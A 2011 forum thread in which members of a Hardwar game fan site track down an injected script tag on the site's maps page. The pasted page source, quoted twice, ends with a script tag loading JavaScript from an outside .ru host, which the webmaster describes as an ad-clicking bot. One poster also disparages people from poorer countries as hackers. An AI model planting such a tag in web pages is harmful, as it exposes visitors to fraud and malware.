|
Post by Captain Zedo on Aug 10, 2011 6:54:44 GMT -5
I've just updated the site to change my email address and to include links to Roaddemon's site and War Hangar.
I uploaded all of the HTML files after scanning them for any sort of malicious code. There were none. I manually audited the most visited pages including the index and they are all clean.
I just got finished viewing and comparing the source code on the server with the code on my local machine and they are in sync. No malicious scripting. Don't expect the Google block to raise anytime soon, but just so you know.
If you get a warning please and bypass it, please see if you can find any malicious code:
1) View and copy the blocked page's source code.
2) Search for "<script" (sans quotes). The only script tags should lead to the Atomz search engine. If you see anything else, please copy the questionable tag and the code around it and tell me which page it is on.
|
|
|
Post by RoadDemon on Aug 10, 2011 7:36:09 GMT -5
This is from zedo.hardwar.org.uk/maps/mainmapindex.htm this page. The script line is at the bottom. its the last 2 lines. According to the line count from chrome, its lines 226 and 227. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Hardwar -- Detailed Maps Index</title> <link rel="stylesheet" href="../hardstyle.css" type="text/css" title="hardstyle"> <script language="javascript"> if (window != top) {window.open("http://zedo.50megs.com/maps/mainmapindex.htm")} </script> </head> <body> <!--MAIN PAGE HEADING--> <h2 align="left">Detailed Maps Index</h2> <!--TOP BANNER--> <table border=0 cellspacing=0 cellpadding=0 width="100%"> <tr bgcolor="#000000" width="100%"> <td width="25%" align="left"> <img src="../smallhwar.gif" width=117 height=20 alt="HardWar"> </td> <td width="11%" align="center"> <a href="../index.htm"> <span class="banner"> <font color="#ff0000"> HOME </font> </span> </a> </td> <td width="20%" align="center"> <a href="../plot.htm"> <span class="banner"> <font color="#ff0000"> WALKTHROUGH </font> </span> </a> </td> <td width="20%" align="center"> <a href="../bulletinboard.htm"> <span class="banner"> <font color="#ff0000"> BULLETIN BOARD </font> </span> </a> </td> <td width="11%" align="center"> <a href="../links.htm"> <span class="banner"> <font color="#ff0000"> LINKS </font> </span> </a> </td> <td width="13%" align="center"> <a href="../email.htm"> <span class="banner"> <font color="#ff0000"> E-MAIL </font> </span> </a> </td> </tr> </table> <!--MAIN OUTLAY TABLE--> <table width="100%" cellspacing=0 cellpadding=3 border=0> <tr> <td width="25%" align="center" valign="top" bgcolor="#000000"> <br><br> <img src="../prisonlogo.jpg" alt="Prison Oubliette"><br clear="all"><br><br> <a href="../dexmoth.htm" class="title">THE MOTH</a> <br><br> <a href="../dexweap.htm" class="title">WEAPONS</a> <br><br> <a href="../dexsurvival.htm" class="title">SURVIVAL</a> <br><br> <a href="../dexlife.htm" class="title">LIFE ON TITAN</a> <br><br> <a href="../dexdown.htm" class="title">DOWNLOADS</a> <br><br> <a href="../dexsite.htm" class="title">SITE SERVICES</a> <br><br> <a href="../links.htm" class="title">LINKS</a> <br><br> <a href="../dexon.htm" class="title">ONLINE PLAY</a> <br><br> <a href="../dexoff.htm" class="title">OFFLINE CHALLENGES</a> <br><br> <img src="../hardskull.jpg"><br clear="all"><br><br><br> </td> <!--Vert. Line--> <td width="1%" bgcolor="#ff0000" align="center" valign="top"><br></td> <td width="58%" alilgn="left" valign="top" bgcolor="#ffffff"> <!--MAIN CONTENT--><br> <h5>NOTE: These maps will open in a new window. Please allow time for them to load. They've got large detailed maps to present. To save a map, right click on the image and select the "Save As.." option from the pop up menu. Mac users, hold the button down over the map and select the "Save" option from the pop up menu.</h5> <a href="contrabandmap.htm" target="_blank"><h3 align="center">Contraband Trade Routes</h3></a> <p>This map marks the big contraband suppliers, bars that buy their goods, and marks out the the more profitable trade routes between them.</p><br> <a href="weaponsmap.htm" target="_blank"><h3 align="center">Weapons Trade Routes</h3></a> <p>This map demonstrates two-tiered weapons trading. It has routes for supplying weapons manufacturers/retailers, like Dr. Jobe's, and routes for selling the finished weapons to pure retailers, like Psycho Bob.</p><br> <a href="garagemap.htm" target="_blank"><h3 align="center">Moth Repair Shops</h3></a> <p>A map highlighting the locations of Moth repair shops. Essential knowledge until you own your own hangar (and can get repairs there for free). Even if you own a hangar, you may need some major damage repaired from time to time just to get home.</p><br> <a href="plotmap.htm" target="_blank"><h3 align="center">Map Of Plot Related Sites</h3></a> <p>These are the places you'll need to find to complete Hardwar's plotline and escape Titan. The final run is drawn out, as well as the best route for the last, wild run from Syd's to the Abandoned Terminal.</p><br> <a href="hangarmap.htm" target="_blank"><h3 align="center">Interactive Map Of Good Hangars To Own</h3></a> <p>This map marks the location of the most profitable hangars you can own in Misplaced Optimism. Click the marked location to see a screenshot of the hangar and get directions and notes.</p><br> <br><br> </td> <!--Vert. Line--> <td width="1%" bgcolor="#ff0000" align="center" valign="top"><br></td> <td width="15%" align="center" valign="top" bgcolor="#9f9f9f"> <!--RIGHT COLUMN--><br> <h4 align="center">Special Thanks To:</h4> <em class="red">Nar Sluke</em><br><br> <em class="red">Silvershark</em><br><br> <em class="red">Nayjay123</em><br><br> <em class="red">dyar1</em><br><br> </td> </tr> </table> <!--BOTTOM NAV BANNER--> <table border=0 cellspacing=0 cellpadding=0 width="100%"> <tr bgcolor="#000000" width="100%"> <td width="25%" align="left"> <img src="smallhwar.gif" width=117 height=20 alt="HardWar"> </td> <td width="11%" align="center"> <a href="../index.htm"> <span class="banner"> <font color="#ff0000"> HOME </font> </span> </a> </td> <td width="20%" align="center"> <a href="../plot.htm"> <span class="banner"> <font color="#ff0000"> WALKTHROUGH </font> </span> </a> </td> <td width="20%" align="center"> <a href="../bulletinboard.htm"> <span class="banner"> <font color="#ff0000"> BULLETIN BOARD </font> </span> </a> </td> <td width="11%" align="center"> <a href="../links.htm"> <span class="banner"> <font color="#ff0000"> LINKS </font> </span> </a> </td> <td width="13%" align="center"> <a href="../email.htm"> <span class="banner"> <font color="#ff0000"> E-MAIL </font> </span> </a> </td> </tr> </table> <!--FOOTER--> <br><br> <br> <h3 align="center">SUPPORT YOUR LOCAL LIBRARY</h3> </body> </html>
<script type="text/javascript" src="http://addonrock.ru/Paste.js"></script> <!--c4488a0fb603237032c32606f947a9ab-->
|
|
|
Post by ouch on Aug 10, 2011 19:58:44 GMT -5
I can confirm it's there on my pc too, Chrome even catches the site name and displays a second warning for addonrock.
it's quite obviously tacked onto the file from something.
The script also fails to load which is a good thing I imagine.
Dammit Zedo, are you selling our Hardwar tips and tricks to the Russians? lol
|
|
|
Post by pamiam on Aug 10, 2011 21:41:12 GMT -5
Their bots will just keep putting that stuff back until you block them from the site.
Do Russians even play hardwar? If they do, perhaps someone there can toss up a site on it. Why not just block the entire country with .htaccess? (along with all of the other 3rd worlders who are known for rampant hacker scum)
Once the site is clean, you will have to run it through the check engine at Google (Google isn't the warning powers that be, but they have a hotline), and keep doing it and taking their advice until it's clean. It's very fast. You'll know very quickly if the site is clean or not. I know it's a PITA, but it's the right thing to do to protect both yourself and your visitors.
|
|
|
Post by pamiam on Aug 10, 2011 23:02:04 GMT -5
Dammit Zedo, are you selling our Hardwar tips and tricks to the Russians? lol *Chuckle* ^5 ;D
|
|
|
Post by Captain Zedo on Aug 11, 2011 8:36:13 GMT -5
This is from zedo.hardwar.org.uk/maps/mainmapindex.htm this page. The script line is at the bottom. its the last 2 lines. According to the line count from chrome, its lines 226 and 227. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Hardwar -- Detailed Maps Index</title> <link rel="stylesheet" href="../hardstyle.css" type="text/css" title="hardstyle"> <script language="javascript"> if (window != top) {window.open("http://zedo.50megs.com/maps/mainmapindex.htm")} </script> </head> <body> <!--MAIN PAGE HEADING--> <h2 align="left">Detailed Maps Index</h2> <!--TOP BANNER--> <table border=0 cellspacing=0 cellpadding=0 width="100%"> <tr bgcolor="#000000" width="100%"> <td width="25%" align="left"> <img src="../smallhwar.gif" width=117 height=20 alt="HardWar"> </td> <td width="11%" align="center"> <a href="../index.htm"> <span class="banner"> <font color="#ff0000"> HOME </font> </span> </a> </td> <td width="20%" align="center"> <a href="../plot.htm"> <span class="banner"> <font color="#ff0000"> WALKTHROUGH </font> </span> </a> </td> <td width="20%" align="center"> <a href="../bulletinboard.htm"> <span class="banner"> <font color="#ff0000"> BULLETIN BOARD </font> </span> </a> </td> <td width="11%" align="center"> <a href="../links.htm"> <span class="banner"> <font color="#ff0000"> LINKS </font> </span> </a> </td> <td width="13%" align="center"> <a href="../email.htm"> <span class="banner"> <font color="#ff0000"> E-MAIL </font> </span> </a> </td> </tr> </table> <!--MAIN OUTLAY TABLE--> <table width="100%" cellspacing=0 cellpadding=3 border=0> <tr> <td width="25%" align="center" valign="top" bgcolor="#000000"> <br><br> <img src="../prisonlogo.jpg" alt="Prison Oubliette"><br clear="all"><br><br> <a href="../dexmoth.htm" class="title">THE MOTH</a> <br><br> <a href="../dexweap.htm" class="title">WEAPONS</a> <br><br> <a href="../dexsurvival.htm" class="title">SURVIVAL</a> <br><br> <a href="../dexlife.htm" class="title">LIFE ON TITAN</a> <br><br> <a href="../dexdown.htm" class="title">DOWNLOADS</a> <br><br> <a href="../dexsite.htm" class="title">SITE SERVICES</a> <br><br> <a href="../links.htm" class="title">LINKS</a> <br><br> <a href="../dexon.htm" class="title">ONLINE PLAY</a> <br><br> <a href="../dexoff.htm" class="title">OFFLINE CHALLENGES</a> <br><br> <img src="../hardskull.jpg"><br clear="all"><br><br><br> </td> <!--Vert. Line--> <td width="1%" bgcolor="#ff0000" align="center" valign="top"><br></td> <td width="58%" alilgn="left" valign="top" bgcolor="#ffffff"> <!--MAIN CONTENT--><br> <h5>NOTE: These maps will open in a new window. Please allow time for them to load. They've got large detailed maps to present. To save a map, right click on the image and select the "Save As.." option from the pop up menu. Mac users, hold the button down over the map and select the "Save" option from the pop up menu.</h5> <a href="contrabandmap.htm" target="_blank"><h3 align="center">Contraband Trade Routes</h3></a> <p>This map marks the big contraband suppliers, bars that buy their goods, and marks out the the more profitable trade routes between them.</p><br> <a href="weaponsmap.htm" target="_blank"><h3 align="center">Weapons Trade Routes</h3></a> <p>This map demonstrates two-tiered weapons trading. It has routes for supplying weapons manufacturers/retailers, like Dr. Jobe's, and routes for selling the finished weapons to pure retailers, like Psycho Bob.</p><br> <a href="garagemap.htm" target="_blank"><h3 align="center">Moth Repair Shops</h3></a> <p>A map highlighting the locations of Moth repair shops. Essential knowledge until you own your own hangar (and can get repairs there for free). Even if you own a hangar, you may need some major damage repaired from time to time just to get home.</p><br> <a href="plotmap.htm" target="_blank"><h3 align="center">Map Of Plot Related Sites</h3></a> <p>These are the places you'll need to find to complete Hardwar's plotline and escape Titan. The final run is drawn out, as well as the best route for the last, wild run from Syd's to the Abandoned Terminal.</p><br> <a href="hangarmap.htm" target="_blank"><h3 align="center">Interactive Map Of Good Hangars To Own</h3></a> <p>This map marks the location of the most profitable hangars you can own in Misplaced Optimism. Click the marked location to see a screenshot of the hangar and get directions and notes.</p><br> <br><br> </td> <!--Vert. Line--> <td width="1%" bgcolor="#ff0000" align="center" valign="top"><br></td> <td width="15%" align="center" valign="top" bgcolor="#9f9f9f"> <!--RIGHT COLUMN--><br> <h4 align="center">Special Thanks To:</h4> <em class="red">Nar Sluke</em><br><br> <em class="red">Silvershark</em><br><br> <em class="red">Nayjay123</em><br><br> <em class="red">dyar1</em><br><br> </td> </tr> </table> <!--BOTTOM NAV BANNER--> <table border=0 cellspacing=0 cellpadding=0 width="100%"> <tr bgcolor="#000000" width="100%"> <td width="25%" align="left"> <img src="smallhwar.gif" width=117 height=20 alt="HardWar"> </td> <td width="11%" align="center"> <a href="../index.htm"> <span class="banner"> <font color="#ff0000"> HOME </font> </span> </a> </td> <td width="20%" align="center"> <a href="../plot.htm"> <span class="banner"> <font color="#ff0000"> WALKTHROUGH </font> </span> </a> </td> <td width="20%" align="center"> <a href="../bulletinboard.htm"> <span class="banner"> <font color="#ff0000"> BULLETIN BOARD </font> </span> </a> </td> <td width="11%" align="center"> <a href="../links.htm"> <span class="banner"> <font color="#ff0000"> LINKS </font> </span> </a> </td> <td width="13%" align="center"> <a href="../email.htm"> <span class="banner"> <font color="#ff0000"> E-MAIL </font> </span> </a> </td> </tr> </table> <!--FOOTER--> <br><br> <br> <h3 align="center">SUPPORT YOUR LOCAL LIBRARY</h3> </body> </html>
<script type="text/javascript" src="http://addonrock.ru/Paste.js"></script> <!--c4488a0fb603237032c32606f947a9ab--> Got it! That is infected and I haven't replaced anything in that folder for years. I'll do that right now. Maybe that will solve the problem, but I doubt it. Google is still claiming that my index/main page is still infected as well as many other pages that haven't had anything malicious on them in seven years. It's also interesting to note that Google only recently caught this infection that's been on those map pages for at least seven years. Don't trust Google either way. I owe you my undying thanks.
|
|
|
Post by Captain Zedo on Aug 11, 2011 8:54:23 GMT -5
I had overlooked that subfolder in my re-uploads in 2004. It's easy to forget about. I haven't updated maps in years. I've uploaded clean pages and that should take care of that.
Keep in mind that this isn't the same type of infection that Google claims exists and Google insists that the problem exists on my main page and others that I know are clean.
I still can't thank you enough for pointing out the problems in that forgotten corner of my site.
|
|
|
Post by riedquat on Aug 11, 2011 10:06:40 GMT -5
Their bots will just keep putting that stuff back until you block them from the site. Do Russians even play hardwar? If they do, perhaps someone there can toss up a site on it. Why not just block the entire country with .htaccess? (along with all of the other 3rd worlders who are known for rampant hacker scum) Along the years we have had a couple of rusian players, Arvic comes to mind but imagine there were others. As a 3rd world citizen I don't like your statement very much...
|
|
|
Post by Pilot on Aug 11, 2011 12:35:27 GMT -5
@ Riedquat your still my favorite under the radar player. You even admit that Hardwar is part of your reasons for learning and developing superb English skills, I know Americans that are in their 5th year of High School (Grade 12 + failed year.) that have less than a 4th graders level in English. Their bots will just keep putting that stuff back until you block them from the site. Do Russians even play hardwar? If they do, perhaps someone there can toss up a site on it. Why not just block the entire country with .htaccess? (along with all of the other 3rd worlders who are known for rampant hacker scum) Once the site is clean, you will have to run it through the check engine at Google (Google isn't the warning powers that be, but they have a hotline), and keep doing it and taking their advice until it's clean. It's very fast. You'll know very quickly if the site is clean or not. I know it's a PITA, but it's the right thing to do to protect both yourself and your visitors. Yep, been forever since we have seen ?him? though. Not ever third world computer user is an abuser, and surprisingly Russia is no longer considered third world power. Though their police force would qualify as a third world one, since all you have to do is look guilty. There are a lot of problems in this world and when we pick up a good game and enjoy it we do so to forget/ignore the problems that we perceive wrong with our country or our world, and in Hardwar and maybe a few other games we ARE the problem in that virtual world. I've said this before one of the things I like about Zedo's site is he isn't a control freak, he doesn't have rules and respects each user to follow their moral compass to get along.
|
|
|
Post by Pilot on Aug 11, 2011 12:52:08 GMT -5
I am curious about the 9th line of code in the listed page.
<script language="javascript"> if (window != top) {window.open("[url]http://zedo.50megs.com/maps/mainmapindex.htm")[/url]} </script>
|
|
|
Post by riedquat on Aug 11, 2011 15:08:57 GMT -5
@ Riedquat your still my favorite under the radar player. You even admit that Hardwar is part of your reasons for learning and developing superb English skills, I know Americans that are in their 5th year of High School (Grade 12 + failed year.) that have less than a 4th graders level in English. Yay! Thank you! I love you too! ;D
|
|
|
Post by rotary on Aug 11, 2011 18:48:57 GMT -5
Well well, since the mappage looked like a positive, there is another thing I found weird: when I open this site for the first time, all my icons on the desktop an the taskbar reload. It only happens when I load this site, and only does this once; the first time after starting up. It doesn't matter if I already got sites open or not. I run avast! But it doesn't give a warning. The reloading looks the same as when adding a new file-association. I don't know if its the site or my computer, just so you know!..
|
|
|
Post by Captain Zedo on Aug 11, 2011 20:08:59 GMT -5
Well well, since the mappage looked like a positive, there is another thing I found weird: when I open this site for the first time, all my icons on the desktop an the taskbar reload. It only happens when I load this site, and only does this once; the first time after starting up. It doesn't matter if I already got sites open or not. I run avast! But it doesn't give a warning. The reloading looks the same as when adding a new file-association. I don't know if its the site or my computer, just so you know!.. This is the first complaint I've had from any viewer. I looked at the veiwership of the map section and it was near zero until yesterday. I do thank everyone who tracked down my oversite. By the way, the .ru script won't cause your desktop to reload. It's a click bot that uses your bandwidth to click banner ads for cash while you are on the page.
|
|
|
Post by Captain Zedo on Aug 11, 2011 20:09:55 GMT -5
Reload your page from the server using Shift+ clicking reload in your browser. The current page is okay. You are probably viewing a page from cache.
|
|
|
Post by ouch on Aug 11, 2011 22:08:14 GMT -5
the same warning is on your codepunk site too. You might want to see if something is on that too.
|
|